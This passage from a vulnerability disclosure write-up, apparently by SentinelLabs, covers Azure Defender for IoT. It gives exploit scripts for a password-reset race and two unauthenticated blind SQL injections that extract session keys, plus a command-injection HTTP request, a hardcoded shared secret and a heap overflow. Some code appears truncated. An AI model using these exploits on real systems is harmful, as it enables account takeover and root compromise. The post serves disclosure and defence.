    while True:"https://{0}/api/configuration/zip-file".format(HOST), data=data, files=files, headers=headers, cookies=cookies, verify=False)
        if not timeout:
def recover_password():
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    cookies = {
        "csrftoken": "aaaa"
    data = {"user": "cyberx"}
    while True:
        req ="https://{0}/api/authentication/recover".format(HOST), json=data, headers=headers, cookies=cookies, verify=False)
        if b"newPassword" in req.content:
def main():
    looper_benign = threading.Thread(target=upload_reset_file, args=(BENIGN_DATA, 0), daemon=True)
    looper_malicious = threading.Thread(target=upload_reset_file, args=(MALICIOUS_DATA, 1), daemon=True)
    looper_recover = threading.Thread(target=recover_password, args=(), daemon=True)
if __name__ == '__main__':

The file is the ZIP file obtained from the Azure portal, as described above and the file is the mentioned specially-crafted ZIP file as described above.

The exploit script above performs the TOCTOU attack to reset and receive the password of the cyberx username without authentication at all. It does so by utilizing three threads:

  • looper_benign – responsible for uploading the benign ZIP file in an infinite loop
  • looper_malicious – the same as looper_benign but uploads the malicious ZIP, in this configuration with a 1 second timeout
  • looper_recover – sends the password recovery request to trigger the vulnerable code

Somewhat unfortunately, the documentation mentions that the ZIP file cannot be tampered with.

This vulnerability is addressed as part of CVE-2021-42310.

Unauthenticated Remote Code Execution As Root #1

At this point, we can obtain a password for the privileged user cyberx. This allows us to login to the SSH server and to execute code as root. Even without this, an attacker could use a stealthier approach to execute code.

After logging in with the obtained password, the attack surface is vastly increased. For example, we found a simple command injection vulnerability within the change password mechanism:

From components\xsense-web\cyberx_web\api\

   def _post(self):
            body = self.parse_body()
            password = body['password']
            username = body['username'].lower()  # Lower case the username mainly because it does not matter
            ip_address = self.get_client_ip_address()
            # 1. validate credentials:
      'validate credentials...')
                user = LoginApiHandler.validate_credentials_and_get_user(username, password, ip_address)
            except UserFriendlyException as e:
                raise e
            except Exception as e:
                logging.error('User authentication failure', exc_info=True)
                raise UserFriendlyException('User authentication failure', e.message)
            # 2. validate new password:
            new_password = body['new_password']
            err_message = UserPasswordApiHandler.validate_password(new_password)
            if err_message:
                raise UserFriendlyException("Password doesn't match security policy", err_message)
            # 3. change password:
  'sudo /usr/local/bin/cyberx-users-password-reset -u {username} -p {password}'
                        .format(username=user.get_username().encode('utf-8'), password=new_password), hide_output=True)
            return {'msg': 'Password has been replaced.'}
        except UserFriendlyException as e:
            raise e
        except Exception as e:
            raise UserFriendlyException("Unable to set password.", e.message)

The function receives three JSON fields from the user, “username”, “password”, “new_password”.

First, it validates the username and password, which we already have. Next, it only checks the complexity of the password using regex, but does not sanitize the input for command injection primitives.

After the validation it executes the /usr/local/bin/cyberx-users-password-reset script as root with the username and new password controlled by an attacker. As the function doesn’t sanitize the input of “new_password” properly, we can inject any command we choose. Our command will then be executed as root with the help of sudo because the cyberx user is a sudoer. This lets us execute code as a root user:

This can be exploited with the following HTTP packet:

POST /api/external/authentication/set_password HTTP/1.1
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cyberx-version=; csrftoken=aaaa; sessionid=kcnjq7wby7c28rxnppcex20gkajej3km; RELOCATE_URL=
Content-Length: 100
Content-Type: multipart/form-data; boundary=47dd42bb4cf2abb6e9c4c81019d8fbb4
{"username" : "cyberx", "password" : "",
"new_password": "``"}

This vulnerability is addressed as part of CVE-2021-42312.


In the remainder of this post, we present two additional routes and new vulnerabilities as well as a vulnerability in the traffic processing framework.

These vulnerabilities are basic SQL Injections (with a twist), yet they have a high impact on the security of the product and the organization’s network.


The DynamicTokenAuthenticationBaseHandler class inherits from BaseHandler and does not require authentication. This class contains two functions (get_version_from_db, uuid_is_connected) which are prone to SQL injection .

def get_version_from_db(self, uuid):
    version = None
    with MySQLClient("", mysql_user, mysql_password, "management") as client:"fetching the sensor version from db")
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        if len(xsenses) > 0:
            version = xsenses[0]['version']
  "sensor version according to db is: {}".format(version))
  "sensor not in db")
    return version
def uuid_is_connected(self, uuid):
    with MySQLClient("", mysql_user, mysql_password, "management") as client:
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        result = len(xsenses) > 0
    return result

As shown, the UUID parameter is not sanitized and formatted into an SQL query. There are a couple of classes which inherit DynamicTokenAuthenticationBaseHandler. The flow to the vulnerable functions actually exists in the token validation process.

Therefore, we can trigger the SQL injection without authentication.

These vulnerabilities can be triggered from:

  1. api/sensors/v1/sync
  2. api/v1/upgrade/status
  3. api/v1/upgrade/upgrade-log

It is worth noting that the function execute_select_query internally calls to the SQL execute, API which supports stacked queries. This makes the “simple” select SQL injection a more powerful primitive (aka executing any query using ‘;’). In our testing we managed to insert, update, and execute SQL special commands.

For the PoC of this vulnerability, we used the api/sensors/v1/sync API. We created the following script to extract a logged in user session id from the database, which eventually allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning
HOST = ""
def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2,3 -- a".format(currChr, currBit)
            body = {
                "token": "aleg",
                "uid": sql
            now =
            res = + "/api/sensors/v1/sync", json=body, verify=False)
            if ( - now).seconds > 2:
                bitStr += "1"
                bitStr += "0"
        final = bitStr[::-1]
        print(int(final, 2))
        chrNum = int(final, 2)
        if not chrNum:
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)
def main():
if __name__ == "__main__":

An example of this script output:

After extracting the session id from the database, we can log in to the management web interface, at which point there are several methods to execute code as root. For example, we could change the password and login to the SSH server (these users are sudoers), use the script scheduling mechanism, or use the command injection vulnerability we mentioned earlier in this post.

This attack is made easy due to the lack of session validation. There is no further layer of validation, such as verifying that the session id is used from the same IP address and User-Agent as the initiator of the session.


The UpdateHandshakeHandlers::is_connected function is also prone to SQL injection.

The class UpdateHandshakeHandler inherits from BaseHandler, which is accessible for unauthenticated users and can be reached via the API: /api/v1/token/update-handshake.

However, this time there is a twist: the _post function does token verification.

class UpdateHandshakeHandlers(BaseHandler):
    def __init__(self):
        super(UpdateHandshakeHandlers, self).__init__()
        self.update_secret = update_secret
    def is_connected(self, sensor_uid):
        with MySQLClient("", mysql_user, mysql_password, "management") as client:
  "fetching the sensor version from db")
            xsenses = client.execute_select_query(
                "SELECT id, UID FROM xsenses WHERE UID = '{}'".format(sensor_uid))
            if len(xsenses) > 0:
      "sensor {} found on db".format(sensor_uid))
                return True
      "sensor {} not in db".format(sensor_uid))
                return False
    def _post(self):
            body = self.parse_body()
        except Exception as ex:
            return self.generic_handler(self.invalid_body)
            sensor_update_secret = body['update_secret']
            sensor_uid = body['xsenseUID']
            if sensor_update_secret != self.update_secret:
                raise Exception('invalid secret')
            if not self.is_connected(sensor_uid):
                raise Exception('only supported with connected sensors')
        except Exception as ex:
            logging.exception('failed to fetch new token')
            return self.generic_handler(self.invalid_token)
"update handshake succeeded")
        token = {
            'token': tokens.get_token()
        return token

This means the API requires a secret token, and without it we cannot exploit this SQL injection vulnerability. Fortunately, this API token is not that secretive. This update.token is hardcoded in the file and is shared across all Defender For IoT installations worldwide, which means that an attacker may exploit this vulnerability without any authentication.

We created the following script to extract a logged in user session id from the database, which allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning
HOST = ""
def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2 -- a".format(currChr, currBit)
            body = {
                "update_secret": "93960370-2f5f-4be1-813e-b7a3768ad288",
                "xsenseUID": sql
            now =
            res = + "/api/v1/token/update-handshake", json=body, verify=False)
            if ( - now).seconds > 2:
                bitStr += "1"
                bitStr += "0"
        final = bitStr[::-1]
        print(int(final, 2))
        chrNum = int(final, 2)
        if not chrNum:
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)
def main():
if __name__ == "__main__":

As with the first SQL injection vulnerability, after extracting the session id from the database, we can use any of the methods mentioned above to execute code as root.


The sensor machine uses RCDCAP (an open source project) to open CISCO ERSPAN and HP ERM encapsulated packets.

The functions ERSPANProcessor::processImpl and HPERMProcessor::processImpl methods are vulnerable to a wildcopy heap based buffer overflow vulnerability, which can potentially allow arbitrary code execution, when processing specially crafted input.

These functions are vulnerable to a wildcopy heap based buffer overflow vulnerability, which can potentially allow arbitrary code execution.

This vulnerability was found by locally fuzzing RCDCAP with pcap files and occurs when this line is executed:


std::copy(&packet[offset + MACHeader802_1Q::getVLANTagOffset()],
        &packet[caplen], &packet[MACHeader802_1Q::getVLANTagOffset()+MACHeader802_1Q::getVLANTagSize()]);

This was reported to the code owner and MSRC; the code owner has already issued a fix:

MSRC, however, decided that this vulnerability does not meet the bar for a MSRC security update and the development group might decide to fix it as needed.


  • Who is affected? Azure Defender for IoT running with unpatched systems are affected. Since this product has many configurations, for example RTOS, which have not been tested, users of these systems can be affected as well.
  • What is the risk? Successful attack may lead to full network compromise, since Azure Defender For IoT is configured to have a TAP (Terminal Access Point) on the network traffic. Access to sensitive information on the network could open a number of sophisticated attacking scenarios that could be difficult or impossible to detect.


We responsibly disclosed our findings to MSRC in June 2021, and Microsoft has released a security advisory with patch details December 2021, which can be found here, here, here, here and here.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched, and checking access logs for irregularities.


Cloud providers heavily invest in securing their platforms, but unknown zero-day vulnerabilities are inevitable and put customers at risk. It’s particularly concerning when it comes to IoT and OT devices that have little to no defenses and depend entirely on these vulnerable platforms for their security posture. Cloud users should take a defense-in-depth approach to cloud security to ensure breaches are detected and contained, whether the threat comes from the outside or from the platform itself.

As part of SentinelLabs’ commitment to advancing public security, we actively invest in research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies and widely share our findings in the interest of protecting all users.

Disclosure Timeline

  • June 21, 2021 – Initial report to MSRC.
  • June 24, 2021 – Initial response from MSRC
  • June 30, 2021 – MSRC requests a PoC video and code.
  • July 1, 2021 – We shared the code and a PoC video with MSRC.
  • July 16, 2021 – MSRC confirmed the bug and started working on a fix.
  • December 14, 2021 – MSRC released an advisory.